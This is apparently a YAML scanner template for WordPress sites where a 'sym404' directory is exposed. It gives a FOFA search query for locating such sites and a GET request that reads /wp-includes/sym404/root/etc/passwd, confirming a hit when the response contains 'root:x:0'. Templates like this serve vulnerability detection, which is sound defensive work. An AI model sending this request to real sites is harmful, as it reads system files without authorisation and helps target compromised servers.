product: WordPress
vName: Wordpress sym404 directory
type: 文件读取
vID: [ ]
level: 3
vDesc: Searches for sensitive directories present in the sym404.
version: ''
note: ''
search:
  FOFA: inurl:"/wp-includes/sym404/"
protocol: http
link: https://twitter.com/momika233/status/1540325055280070656
fix:
  - 建议联系软件厂商进行处理。
model: ''
logic: and
exploit:
  - exp:
      method: get
      follow: false
      path: /wp-includes/sym404/root/etc/passwd
    verify:
      logic: and
      check:
        - body:
            value:
              - 'root:x:0'
            logic: and
        - status: 200
